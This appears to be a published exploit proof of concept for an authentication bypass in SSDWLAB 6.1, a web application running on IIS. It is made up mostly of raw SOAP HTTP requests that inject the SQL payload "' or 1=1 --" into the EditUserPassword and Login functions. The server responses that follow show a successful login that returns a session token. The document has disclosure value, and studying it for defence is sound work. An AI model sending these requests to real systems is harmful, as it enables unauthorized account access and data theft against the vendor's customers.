Share
# Exploit Title: SSDWLAB 6.1 - Authentication Bypass  
# Date: 2019-10-01  
# Exploit Author: Luis Buendía (exoticpayloads)  
# Vendor Homepage: http://www.sbpsoftware.com/  
# Version: 6.1  
# Tested on: IIS 7.5  
# CVE : Pending  
#Description: By injection on the SOAP function in the EditUserPassword function, it is possible to create a "fake" user and authenticate with it.  
  
Request to the EditUserPassword Function  
  
POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1  
Host: XXXXXXX.com  
Content-Type: text/xml; charset=utf-8  
Content-Length: 462  
SOAPAction: "http://tempuri.org/EditUserPassword"  
  
<?xml version="1.0" encoding="utf-8"?>  
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  
<soap:Body>  
<EditUserPassword xmlns="http://tempuri.org/">  
<coUser>' or 1=1 --</coUser>  
<sOldPwd>string</sOldPwd>  
<sNewPwd>string</sNewPwd>  
<coLang>ENG</coLang>  
</EditUserPassword>  
</soap:Body>  
</soap:Envelope>  
  
Example of Response when injection is succesfull  
  
HTTP/1.1 200 OK  
Cache-Control: private, max-age=0  
Content-Type: text/xml; charset=utf-8  
X-AspNet-Version: 4.0.30319  
X-Powered-By: XXX.XXX  
Content-Length: 421  
  
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><EditUserPasswordResponse xmlns="http://tempuri.org/"><EditUserPasswordResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /></EditUserPasswordResult></EditUserPasswordResponse></soap:Body></soap:Envelope>  
  
Request to Login After Successful Request  
  
POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1  
Host: XXXXXXX.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Referer: https://XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[[DYNAMIC]]/2  
Content-Type: text/xml; charset=utf-8  
SOAPAction: "http://tempuri.org/Login"  
Content-Length: 406  
  
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<SOAP-ENV:Body>  
<tns:Login xmlns:tns="http://tempuri.org/">  
<tns:sUser>' or 1=1 --</tns:sUser>  
<tns:sPwd>string</tns:sPwd>  
<tns:sLang>ENG</tns:sLang>  
</tns:Login>  
</SOAP-ENV:Body>  
</SOAP-ENV:Envelope>  
  
Example of succesfull login  
  
HTTP/1.1 200 OK  
Cache-Control: private, max-age=0  
Content-Type: text/xml; charset=utf-8  
Vary: Accept-Encoding  
X-AspNet-Version: 4.0.30319  
X-Powered-By: XXX.XXX  
Connection: close  
Content-Length: 422  
  
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><LoginResponse xmlns="http://tempuri.org/"><LoginResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /><data>d62cc3c0b2e3413cb8b4a85b0fa6177b</data></LoginResult></LoginResponse></soap:Body></soap:Envelope>